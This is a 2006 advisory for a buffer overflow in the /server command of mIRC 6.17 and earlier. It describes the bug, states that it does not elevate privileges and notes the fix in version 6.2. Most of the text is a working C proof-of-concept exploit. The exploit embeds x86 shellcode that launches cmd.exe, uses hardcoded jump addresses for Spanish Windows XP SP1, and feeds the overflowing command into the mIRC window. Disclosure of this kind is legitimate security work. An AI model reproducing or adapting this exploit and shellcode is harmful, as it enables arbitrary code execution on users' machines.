Proof of concept exploit that takes advantage of a buffer overflow in the /server directive of mIRC versions 6.17 and below. In a default install, this does not elevate privileges.
faeff6b29609fcd7cc837a37cb26366988e997241fd67e93e33221f8b168a3f6
- 1 - Introduction
Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is
well equipped with options and tools.
- 2 - Vulnerability description
Vulnerable mIRC 6.17 and minor.
Using the command /server with long parameters initially don't crash,
but if introduces again the same text don't check the lenght when
update the info and mIRC crash overwritting the EIP.
It's a minor bug and DON'T ELEVATE PRIVILEGES.
- 3 - How to exploit it
This PoC open a cmd.exe,also it's possible execute any other code.
----------- mircServerexploitXPSP1.c ----------------------
/*
This PoC it's for XP SP1 Spanish
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
int main () {
HWND lHandle;
char command[512]= "//server -a $str(A,352) $+ ";
char command2[512]=" $+ $str(A,56) $+ ";
char command3[512]=" $+ $str(B,52) ";
char finalcommand[1024]="";
char strClass[30];
char shellcode[999]=
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\x44\x80\xbf\x77"
"\xFF\xD3"
"\x90\x90\xFF\xE1";
//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 0x77c293c7
(WinXP Sp1 Spanish)
char saltaoffset[]="\xF0\xFA\xD8\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90";
// 0x77D8FAF0
SetForegroundWindow(lHandle);
lHandle = FindWindowEx(FindWindowEx(FindWindowEx(FindWindow("mIRC",NULL),
0, "MDIClient", 0),0, "mIRC_Status", 0), 0, "Edit", 0);
if (!lHandle) { printf("Can't find mIRC\n"); return 0; }
strcat(shellcode,command2);
strcat(shellcode,saltaoffset);
strcat(command,shellcode);
strcat(command,command3);
strcat(finalcommand,command);
strcat(finalcommand,"| ");
strcat(finalcommand,command);
printf("%s\n", finalcommand);
SendMessage(lHandle, WM_SETTEXT,0,(LPARAM)finalcommand);
SendMessage (lHandle, WM_IME_KEYDOWN, VK_RETURN, 0);
}
/* Eof */
----------- CUT HERE ----------------------
- 4 - Solution
Fixed on mIRC 6.2. Link to download http://www.mirc.com/get.html
- 5 - Credits
URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 02/08/2006